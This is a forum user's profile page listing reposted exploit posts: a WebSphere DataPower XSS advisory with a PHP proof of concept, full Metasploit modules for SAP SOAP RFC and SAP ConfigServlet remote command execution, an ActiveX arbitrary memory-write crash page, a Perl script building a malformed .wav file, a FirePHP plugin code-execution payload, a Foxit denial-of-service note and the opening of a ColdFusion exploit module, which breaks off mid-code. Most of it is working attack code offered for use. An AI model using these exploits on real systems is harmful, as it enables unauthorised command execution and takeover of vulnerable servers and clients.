snakeO2
Members-
Posts
17 -
Joined
-
Last visited
About snakeO2
- Birthday 10/24/1982
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
snakeO2's Achievements
Newbie (1/14)
10
Reputation
-
SEC Consult Vulnerability Lab Security Advisory < 20130523-0 > ======================================================================= title: JavaScript Execution in WebSphere DataPower Services product: IBM WebSphere DataPower Integration Appliance XI50 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0 fixed version: not available, config changes CVE number: CVE-2013-0499 impact: Low/Medium homepage: https://www.ibm.com/ found: 2013-01-28 by: A. Falkenberg SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- WebSphere® DataPower® appliances simplify, govern, and optimize the delivery of services and applications and enhance the security of XML and IT services. They extend the capabilities of an infrastructure by providing a multitude of functions. URL: IBM - Software - WebSphere DataPower SOA Appliances - United States Vulnerability overview/description: ----------------------------------- For the purposes of debugging, DataPower provides configuration options to echo requests received from the client. For example, XML Firewall service can be configured to echo requests by choosing the backend as 'loopback'. Other services like Multi Protocol Gateway and Web Service Proxy can be configured to echo requests by setting the variable “var://service/mpgw/skip-backside” in its processing policy. In such configurations, the requests are not sent to a backend server. Without adequate validation and processing, the requests may be echoed back to the client. Loopback services that blindly echo requests should only be used for debugging purposes and not intended to be run in production environments as they can result in potential security threats. For example, if an arbitrary JavaScript embedded request is sent to such services, they will simply echo it back resulting in a potential JavaScript execution vulnerability in the client's browser. URL: https://www-304.ibm.com/support/docview.wss?uid=swg21637717 Proof of concept: ----------------- The proof of concept was tested on an IBM Xi50 with the backend configured as a "loopback" Web Service. The "loopback" Web Service can be used to execute arbitrary JavaSscript code in a victims browser. Any valid SOAP message sent to the Web service is returned unmodified to the receiver. If the SOAP response of the "loopback" Web Service is parsed by a browser, any JavaScript that is contained within the XML document will get executed. The following PHP script demonstrates a reflected cross site scripting. <?php $soapEndpoint = "http://127.0.0.1:80";; $soapMessage = '<?xml version="1.0"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:sam="http://sample02.policy.samples.rampart.apache.org";> <soapenv:Header/> <soapenv:Body> <sam:echo> <html:html xmlns:html="http://www.w3.org/1999/xhtml";> <html:script>alert("XML XSS");</html:script> </html:html> </sam:echo> </soapenv:Body> </soapenv:Envelope>'; if(isset($_POST['soapMessage']) and isset($_POST['soapUrl'])){ $soap_do = curl_init(); curl_setopt($soap_do, CURLOPT_URL, $_POST['soapUrl'] ); curl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($soap_do, CURLOPT_TIMEOUT, 10); curl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true ); curl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($soap_do, CURLOPT_POST, true ); curl_setopt($soap_do, CURLOPT_POSTFIELDS, $_POST['soapMessage']); curl_setopt($soap_do, CURLOPT_HTTPHEADER, array('Content-Type: text/xml; charset=utf-8', 'Content-Length: '.strlen($_POST['soapMessage']) )); $result = curl_exec($soap_do); $err = curl_error($soap_do); header('Content-type: text/xml'); echo $result; exit; } ?> <html> <body> <h1>XSS XML Proxy</h1> <form name="input" action="" method="post"> SOAP Endpoint: <input type="text" name="soapUrl" value="<?php echo $soapEndpoint; ?>"><br /> SOAP Message: <textarea cols="70" name="soapMessage" rows="14"><?php echo $soapMessage; ?></textarea><br /> <br /> <input type="submit" value="Submit"> </form> </body> </html> Vulnerable / tested versions: ----------------------------- SEC Consult verified the vulnerability in the WebSphere DataPower Appliance XI50. The vendor provided an extended list of vulnerable versions: WebSphere DataPower 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0. Vendor contact timeline: ------------------------ 2013-01-30: Sending advisory and proof of concept exploit via encrypted channel. 2013-01-31: Vendor confirms receipt 2013-05-17: Vendor posts security bulletin 2013-05-23: SEC Consult releases coordinated security advisory. Solution: --------- The vendor does not offer a patch. The vulnerability can be prevented by disabling the services to blindly echo requests back. A detailed description can be found on the vendor's site: https://www-304.ibm.com/support/docview.wss?uid=swg21637717 Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm Sursa: Bugtraq: SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services
-
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # This module is based on, inspired by, or is a port of a plugin available in # the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. # Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and # experience - a very cool guy. # # The following guys from ERP-SCAN deserve credit for their contributions - # Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and # Dmitry Evdokimov. # # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis # who have Beta tested the modules and provided excellent feedback. Some people # just seem to enjoy hacking SAP ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::CmdStagerVBS include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution', 'Description' => %q{ This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64 bits and Linux 64 bits platforms. }, 'References' => [ [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ] ], 'DisclosureDate' => 'Mar 26 2013', 'Platform' => ['win', 'unix'], 'Targets' => [ [ 'Linux', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' #'Payload' => #{ #'DisableNops' => true, #'Space' => 232, #'Compat' => #{ #'PayloadType' => 'cmd', #'RequiredCmd' => 'perl ruby', #} #} } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64, 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'Author' => [ 'nmonkee' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(8000), OptString.new('CLIENT', [true, 'SAP Client', '001']), OptString.new('USERNAME', [true, 'Username', 'SAP*']), OptString.new('PASSWORD', [true, 'Password', '06071992']) ], self.class) register_advanced_options( [ OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]), ], self.class) end def send_soap_request(data) res = send_request_cgi({ 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'ctype' => 'text/xml; charset=UTF-8', 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', }, 'vars_get' => { 'sap-client' => datastore['CLIENT'], 'sap-language' => 'EN' } }) return res end def build_soap_request(command, sap_command, sap_os) data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>" data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" data << "<env:Body>" data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>" data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>" data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>" data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>" data << "</n1:SXPG_CALL_SYSTEM>" data << "</env:Body>" data << "</env:Envelope>" return data end def check data = rand_text_alphanumeric(4 + rand(4)) res = send_soap_request(data) if res and res.code == 500 and res.body =~ /faultstring/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit if target.name =~ /Windows/ linemax = datastore['PAYLOAD_SPLIT'] vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250 print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request") execute_cmdstager({ :delay => 0.35, :linemax => linemax }) elsif target.name =~ /Linux/ file = rand_text_alphanumeric(5) stage_one = create_unix_payload(1,file) print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...") res = send_soap_request(stage_one) if res and res.code == 200 and res.body =~ /External program terminated/ print_good("#{rhost}:#{rport} - Payload dump was successful") else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed") end stage_two = create_unix_payload(2,file) print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...") send_soap_request(stage_two) end end def create_unix_payload(stage, file) command = "" if target.name =~ /Linux/ if stage == 1 my_payload = payload.encoded.gsub(" ","\t") my_payload.gsub!("&","&") my_payload.gsub!("<","<") command = "-o /tmp/" + file + " -n pwnie" + "\n!" command << my_payload command << "\n" elsif stage == 2 command = "-ic /tmp/" + file end end return build_soap_request(command.to_s, "DBMCLI", "ANYOS") end def execute_command(cmd, opts) command = cmd.gsub(/&/, "&") command.gsub!(/%TEMP%\\/, "") data = build_soap_request("{command}", "LIST_DB2DUMP", "ANYOS") begin res = send_soap_request(data) if res and res.code == 200 return else if res and res.body =~ /faultstring/ error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}) 0.upto(error.length-1) do |i| vprint_error("#{rhost}:#{rport} - Error #{error[i]}") end end fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect") end end end Sursa: SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
-
SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Vulnerability tested against: Microsoft Windows Server 2003 r2 sp2 Microsoft Windows XP sp3 Microsoft Windows 7 Internet Explorer 7/8 software description: http://en.wikipedia.org/wiki/Solid_Edge vendor site: http://www.siemens.com/entry/cc/en/ download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm file tested: SolidEdgeV104ENGLISH_32Bit.exe background: the mentioned software installs an ActiveX control with the following settings: ActiveX settings: ProgID: SELISTCTRLX.SEListCtrlXCtrl.1 CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D} binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx Safe For Scripting (Registry): True Safe For Initialization (Registry): True Vulnerability: This control exposes the SetItemReadOnly() method, see typelib: ... /* DISPID=14 */ function SetItemReadOnly( /* VT_VARIANT [12] */ $hItem, /* VT_BOOL [11] */ $bReadOnly ) { } ... (i) By setting to a memory address the first argument and the second one to 'false' you can write a NULL byte inside an arbitrary memory region. (ii) By setting to a memory address the first argument and the second one to 'true' you can write a \x08 byte inside an arbitrary memory region. Example crash: EAX 61616161 ECX 0417AB44 EDX 01B7F530 EBX 0000000C ESP 01B7F548 EBP 01B7F548 ESI 0417A930 EDI 027D5DD0 SEListCt.027D5DD0 EIP 033FD158 control.033FD158 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFD9000(4000) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF ST1 empty 3.3760355862290856960e-4932 ST2 empty +UNORM 48F4 00000000 00000000 ST3 empty -2.4061003025887744000e+130 ST4 empty -UNORM C198 00000000 00000000 ST5 empty 0.0 ST6 empty 1633771873.0000000000 ST7 empty 1633771873.0000000000 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Call stack of thread 000009B8 Address Stack Procedure / arguments Called from Frame 01B7F54C 027D5DF3 control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z SEListCt.027D5DED 01B7F548 01B7F560 787FF820 Includes SEListCt.027D5DF3 mfc100u.787FF81E 01B7F55C 01B7F56C 78807BF5 mfc100u.787FF810 mfc100u.78807BF0 01B7F618 01B7F61C 78808312 ? mfc100u.78807A5B mfc100u.7880830D 01B7F618 vulnerable code, inside the close control.dll: ... ;------------------------------------------------------------------------------ Align 4 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z: push ebp mov ebp,esp mov eax,[ebp+08h] test eax,eax jz L1011D15C cmp dword ptr [ebp+0Ch],00000000h jz L1011D158 or dword ptr [eax+2Ch],00000008h <-------------------- it crashes here pop ebp retn 0008h ;------------------------------------------------------------------------------ ... ... ;------------------------------------------------------------------------------ L1011D158: and dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here L1011D15C: pop ebp retn 0008h ;------------------------------------------------------------------------------ ... As attachment, code to reproduce the crash. <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' /> </object> <script language='javascript'> //obj.SetItemReadOnly(0x61616161,false); obj.SetItemReadOnly(0x61616161,true); </script> Sursa: SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE
-
# Title : Windows Media Player 11.0.0 (.wav) Crash PoC # Date: 2013-01-12 # Software Link: Lecteur Windows Media - Microsoft Windows # Vendor : T?l?chargement de Windows Media Player # Author: Asesino04 # Tested on: Windows XP SP2 # Home: ??????? ARAB ?????? # Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s / Inj3ct0r Team # Exploit Code (perl) : #!/usr/bin/perl system("title The Black Devils"); system("color 1e"); system("cls"); print "\n\n"; print " |=======================================================|\n"; print " |= [!] Name : Windows Media Player 11.0 ||.wav =|\n"; print " |= [!] Exploit : Crash Poc =|\n"; print " |= [!] Author : Asesino04 =|\n"; print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n"; print " |=======================================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01". "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E". "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22". "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01". "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E". "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22". "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00"; open(file , ">", "PoC.wav"); # Evil File wav print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! "; close(file); # Contact : ------------------ # Fane Page : www.facebook.com/Th3.Black.D3Vils # Youtube : www.youtube.com/user/Th3BlackDevils # Facebook : www.facebook.com/DevilsDz # Email : mr.k4rizma@gmail.com Sursa: Windows Media Player 11.0.0 (.wav) - Crash PoC
-
SAP ConfigServlet OS Command Execution SAP ConfigServlet command execution sap-configservlet-command-exec (83637) The risk level is classified as HighHigh Risk Description: SAP ConfigServlet could allow a remote attacker to execute arbitrary commands on the system. By sending a specially-crafted GET request, an attacker could exploit this vulnerability to inject and execute arbitrary commands on the system. *CVSS: Base Score: 10 Access Vector: Network Access Complexity: Low Authentication: None Confidentiality Impact: Complete Integrity Impact: Complete Availability Impact: Complete Temporal Score: 9 Exploitability: Functional Remediation Level: Unavailable Report Confidence: Uncorroborated Consequences: Gain Access Remedy: No remedy available as of April 24, 2013. References: Offensive Security Exploit Database [04-18-2013]: SAP ConfigServlet OS Command Execution. Packet Storm Security [04-19-2013]: SAP ConfigServlet OS Command Execution. SAP Web site: SAP. Platforms Affected: SAP ConfigServlet Reported: Apr 18, 2013 Sursa: ISS X-Force Database: sap-configservlet-command-exec(83637): SAP ConfigServlet command execution require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'SAP ConfigServlet OS command execution', 'Description' => %q{ This module allows execution of operating system commands through the SAP ConfigServlet without any authentication. }, 'Author' => [ 'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation) 'Andras Kabai', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'], ], 'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation )) register_options( [ Opt::RPORT(50000), OptString.new('CMD', [ true, 'The command to execute', 'whoami']), OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']), OptBool.new('SSL', [true, 'Use SSL', false]) ], self.class) end def run_host(ip) begin print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD']) res = send_request_cgi( { 'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']), 'method' => 'GET', }) if !res or res.code != 200 print_error("#{rhost}:#{rport} - Exploit failed.") return end rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} - Failed to connect to the server") return end if res.body.include?("Process created") print_good("#{rhost}:#{rport} - Exploited successfully\n") print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") print_line("#{rhost}:#{rport} - Output: #{res.body}") else print_error("#{rhost}:#{rport} - Exploit failed.") vprint_error("#{rhost}:#{rport} - Output: #{res.body}") end end end Sursa: SAP ConfigServlet OS Command Execution
-
Oracle WebCenter Sites Satellite Server - HTTP Header Injection
snakeO2 posted a topic in Exploituri
SEC Consult Vulnerability Lab Security Advisory < 20130417-2 > ======================================================================= title: HTTP header injection/Cache poisoning in Oracle WebCenter Sites Satellite Server product: Oracle WebCenter Sites Satellite Server (former FatWire Satellite Server) vulnerable version: 7.6.0 Patch1, 7.6.2, 11.1.1.6.0, 11.1.1.6.1 fixed version: Patch information see sections below CVE: CVE-2013-1509 impact: medium homepage: Oracle and FatWire found: 2012-09-17 by: K. Gudinavicius SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- FatWire Satellite Server is a predecessor product of Oracle WebCenter Sites Satellite Server. "Oracle WebCenter Sites Satellite Server enables organizations to deliver segmented, targeted, and dynamically assembled content across global Web properties with rapid response times and intelligent edge caching to optimize and speed the delivery of dynamic Web experiences." Source: http://www.oracle.com/us/products/middleware/webcenter/satellite-server/overview/index.html Vulnerability overview/description: ----------------------------------- Due to unsanitized user input it is possible to inject arbitrary HTTP header values in certain HTTP responses of the Satellite Server. This can be exploited, for example, to perform session fixation and malicious redirection attacks via the Set-Cookie and the Refresh headers. Moreover, the Satellite Server caches these HTTP responses with the injected HTTP header resulting in all further requests to the same resource being served with the poisoned HTTP response, while these objects remain in cache. Proof of concept: ----------------- An arbitrary header can be injected in the HTTP responses of the downloadable resources. The values of the blobheadername2 and the blobheadervalue2 URL parameters are user controllable. In the following example the Refresh header is injected: http://fatwire/cs/Satellite?blobcol=urldata&blobheadername1=content-type&blobheadername2=Refresh& blobheadervalue1=application/pdf&blobheadervalue2=0;url=http://www.sec-consult.com&blobkey=id& blobnocache=false&blobtable=MungoBlobs&blobwhere=1342534304149&ssbinary=true&site=S08 The returned HTTP response will contain the injected Refresh header and its value. Furthermore, the HTTP response will be cached, so the next time users will be accessing the same downloadable resource using the standard URL, they will be affected and redirected using the injected Refresh header value. HTTP/1.1 200 OK Date: Thu, 06 Sep 2012 15:59:04 GMT Refresh: 0;url=http://www.sec-consult.com Last-Modified: Thu, 06 Sep 2012 15:54:20 GMT Content-Type: application/pdf Connection: close Content-Length: 772193 Vulnerable / tested versions: ----------------------------- The following installation has been tested: * FatWire Satellite Server 7.6.0 Patch1. Vendor contact timeline: ------------------------ 2012-11-26: Contacting vendor through secalert_us@oracle.com 2012-11-26: Vendor response, will investigate issues 2012-11-27: Investigation ongoing, the following ID assigned: S0321206 - ARBITRARY HTTP HEADER INJECTION/CACHE POISONING IN FATWIRE 2013-01-25: S0321206 Issue fixed in main codeline, scheduled for a future CPU 2013-04-12: S0321206 is fixed in upcoming CPU on 2013-04-16 2013-04-16: Oracle releases April 2013 CPU 2013-04-17: Public release of SEC Consult advisory Solution: --------- Apply latest patches, see: Oracle Critical Patch Update - April 2013 Workaround: ----------- Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm Sursa: Oracle WebCenter Sites Satellite Server - HTTP Header Injection -
# Exploit Title: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF (Portable Document Format) XREF (Cross Reference Table) parsing Denial of Service Vulnerability # Date (found): 2012.11.17 # Date (publish): 2013.04.17 # Exploit Author: FuzzMyApp # Vendor Homepage: PDF Converter PDF Editor Edit and Convert PDF, Word files to PDF, Free PDF convert, save PDF forms, create PDF forms, pdf documents, protect pdf # Version: 5.4.3.* - 5.4.5.0124 (till latest) # Tested on: Windows XP SP3 Professional Edition Name:PDF Cross Reference Table parsing Denial of Service vulnerability. Type:DoS Description:Foxit Reader does not validate data in PDF Cross Reference Table (XREF) header properly. Tampering with XREF header may lead to integer division by zero exception during its parsing by the application. Raised, not handled, exception causes Denial of Service of Foxit Reader. Vendor was notified on 2013.02.21 but has not responded to this submission. This issue is present in the latest version of application avaiable at the time of writing. Exception:Integer division by zero exception. Disasm:0055EB70 |> \33C0 |XOR EAX,EAX 0055EB72 |> 8B28 |MOV EBP,DWORD PTR DS:[EAX] 0055EB74 |. 896C24 64 |MOV DWORD PTR SS:[ESP+64],EBP 0055EB78 |. 8D3C2E |LEA EDI,DWORD PTR DS:[ESI+EBP] 0055EB7B |. 3BFE |CMP EDI,ESI 0055EB7D |. 897C24 20 |MOV DWORD PTR SS:[ESP+20],EDI 0055EB81 |. 0F82 7F020000 |JB Foxit_Re.0055EE06 0055EB87 |. 83C8 FF |OR EAX,FFFFFFFF 0055EB8A |. 33D2 |XOR EDX,EDX 0055EB8C |. F7F7 |DIV EDI ; [www.FuzzMyApp.com] Integer division by zero exception 0055EB8E |. 394424 3C |CMP DWORD PTR SS:[ESP+3C],EAX 0055EB92 |. 0F83 6E020000 |JNB Foxit_Re.0055EE06 Advisory: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF (Portable Document Format) XREF (Cross Reference Table) parsing Denial of Service Vulnerability Exploit PoC: http://fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042.pdf http://www.exploit-db.com/sploits/24962.pdf Sursa: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability
-
FirePHP Firefox Plugin 0.7.1 - Remote Command Execution # Exploit Title: Firephp firefox plugin RCE # Date: 17/04/2013 # Exploit Author: Wireghoul # Vendor Homepage: FirePHP - Firebug Extension for AJAX Development # Software Link: https://addons.mozilla.org/en-US/firefox/addon/firephp/versions/ # Version: All versions up to and including 0.7.1 # Tested on: Windows 7 # Advisory: FirePHP Firefox plugin RCE PoC <?php /************************************************************* * FirePHP Firefox plugin RCE PoC * * Written by Wireghoul - http://www.justanotherhacker.com * * Greetz to @bcoles urbanadventurer @malerisch * *************************************************************/ // XUL code to launch calc.exe $exploit = '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>'; $exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);'; $exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");'; $exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);'; $exploit.= 'process.init(lFile);'; $exploit.= 'process.run(true,[],0);void(0);'; $exploit.= '<\/SCRIPT>":"PWNT"}}'; // Send FirePHP dump data header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2"); header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3"); header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1"); $payload= "X-Wf-1-1-1-1: "; $payload.= strlen($exploit).'|'.$exploit."|\r\n"; header($payload); ?> <html> <head> <title>FirePHP Firefox plugin RCE PoC</title> </head> <body> PWNT! </body> </html> Sursa: FirePHP Firefox Plugin 0.7.1 - Remote Command Execution
-
Adobe ColdFusion APSB13-03 Remote Exploit ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'digest/sha1' require 'openssl' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe ColdFusion APSB13-03', 'Description' => %q{ This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03: * CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only) * CVE-2013-0629: directory traversal * CVE-2013-0632: authentication bypass }, 'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0625'], [ 'CVE', '2013-0629'], # we don't actually exploit this, as this is the backdoor # dropped by malware exploiting the other vulnerabilities [ 'CVE', '2013-0631'], [ 'CVE', '2013-0632'], ], 'Targets' => [ ['Automatic Targeting', { 'auto' => true }], [ 'Universal CMD', { 'Arch' => ARCH_CMD, 'Platform' => ['unix', 'win', 'linux'] } ] ], 'DefaultTarget' => 1, 'Privileged' => true, 'Platform' => [ 'win', 'linux' ], 'DisclosureDate' => 'Jan 15 2013')) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptBool.new('USERDS', [ true, 'Authenticate with RDS credentials', true ]), OptString.new('CMD', [ false, 'Command to run rather than dropping a payload', '' ]), ], self.class) register_advanced_options( [ 